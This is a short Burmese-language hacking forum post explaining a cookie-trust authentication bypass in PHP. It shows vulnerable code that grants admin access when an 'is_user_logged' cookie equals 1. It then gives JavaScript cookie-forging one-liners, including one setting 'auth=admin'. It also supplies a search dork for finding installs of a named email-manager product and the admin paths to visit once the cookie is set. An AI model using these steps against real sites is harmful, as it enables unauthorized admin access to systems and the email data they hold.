Web Server ေတြရဲ႕ Cookie Handle အလြဲကေန admin access ရယူသြားတဲ့ Vuln ျဖစ္ပါတယ္။
ဥပမာ vuln.php ရဲ႕ Code ကို တစ္ခ်က္ၾကည့္လိုက္ပါ ။
Code
if($_POST['password'] == $thepass) { setcookie("is_user_logged","1"); } else { die("Login failed!"); } ............ etc ................. if($_COOKIE['is_user_logged']=="1") { include "admin.php"; else { die('not logged'); }
သူ႕မွာ လြဲသြားတဲ့အေၾကာင္းအရာက "is_user_logged" ဆိုတဲ့ Variable ျဖစ္ပါတယ္ Browser ထဲက Cookie ရွိရင္ Vale 1 အျဖစ္သတ္မွတ္ျပီး Log in အ၀င္ခံလိုက္တဲ့ သေဘာပါ အဲ့ဒီ့မွာပဲ
javascript:document.cookie = "is_user_logged=1; path=/";
ဆိုျပီး Javascript Inject လုပ္လိုက္ရံုနဲ႕ Log in ၀င္ျပီးသားျဖစ္သြားပါ့မယ္ ။
Online Email Manager မွာ ေပါက္သြားတဲ့ Vuln အေၾကာင္းၾကည့္လုိက္ရင္ ပိုျပီး သေဘာေပါက္သြားမွာပါ ။
DorK : Powered by Online Email Manager
အဲ့ဒီ့မွာ http://www.site.com/demo/OEM/admin/index.php ဆိုပါစို႕ အဲ့ဒီ့မွာ
javascript:document.cookie = "auth=admin; path=/"; လို႕ Javascript Inject လုပ္လိုက္ျပီး emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php )
ကိုသြားလိုက္ရံုနဲ႕ Admin အျဖစ္ Login ၀င္ေနျပီးသားျဖစ္တာ ေတြ႕မွာပါ
Ref : SirGod
post by negative thunder
copy from MHF